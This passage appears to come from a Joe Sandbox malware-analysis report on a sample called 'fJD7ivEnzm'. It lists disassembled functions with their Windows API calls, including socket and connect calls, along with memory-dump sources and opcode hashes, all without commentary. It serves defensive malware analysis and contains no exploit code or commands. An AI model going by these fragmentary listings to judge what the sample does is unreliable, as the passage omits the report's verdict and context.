                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                            • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                            • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                            • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                            • Part of subcall function 00440D98: SendMessageW.USER32(009C1AC0,000000F1,00000000,00000000), ref: 00440E6E
                                                                            • Part of subcall function 00440D98: SendMessageW.USER32(009C1AC0,000000F1,00000001,00000000), ref: 00440E9A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnableMessageSend$LongShow
                                                                          • String ID:
                                                                          • API String ID: 142311417-0
                                                                          • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                          • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                          • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                          • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                          Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                          • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                          • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                          • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                          Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 00445879
                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                          • _wcslen.LIBCMT ref: 004458FB
                                                                          • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                          • String ID:
                                                                          • API String ID: 3087257052-0
                                                                          • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                          • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                          • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                          • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                          Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 245547762-0
                                                                          • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                          • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                          • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                          • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                          Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                          • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                          • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                          • BeginPath.GDI32(?), ref: 0044723D
                                                                          • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Object$Select$BeginCreateDeletePath
                                                                          • String ID:
                                                                          • API String ID: 2338827641-0
                                                                          • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                          • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                          • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                          • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                          Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000), ref: 00434598
                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                          • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CounterPerformanceQuerySleep
                                                                          • String ID:
                                                                          • API String ID: 2875609808-0
                                                                          • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                          • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                          • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                          • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                          Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                          • MessageBeep.USER32(00000000), ref: 00460C46
                                                                          • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                          • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 3741023627-0
                                                                          • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                          • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                          • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                          • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                          Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteObjectWindow$Icon
                                                                          • String ID:
                                                                          • API String ID: 4023252218-0
                                                                          • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                          • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                          • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                          • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                          Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                          • String ID:
                                                                          • API String ID: 1489400265-0
                                                                          • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                          • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                          • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                          • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                          Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                          • DestroyWindow.USER32(?), ref: 00455728
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 1042038666-0
                                                                          • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                          • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                          • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                          • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                          Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                          • String ID:
                                                                          • API String ID: 2625713937-0
                                                                          • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                          • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                          • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                          • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                          Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __getptd.LIBCMT ref: 0041780F
                                                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                          • __getptd.LIBCMT ref: 00417826
                                                                          • __amsg_exit.LIBCMT ref: 00417834
                                                                          • __lock.LIBCMT ref: 00417844
                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                          • String ID:
                                                                          • API String ID: 938513278-0
                                                                          • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                          • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                          • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                          • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                          Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                          • ExitThread.KERNEL32 ref: 00413D4E
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                          • __freefls@4.LIBCMT ref: 00413D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                          • String ID:
                                                                          • API String ID: 2403457894-0
                                                                          • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                          • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                          • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                          • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                          Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                          • ExitThread.KERNEL32 ref: 004151ED
                                                                          • __freefls@4.LIBCMT ref: 00415209
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
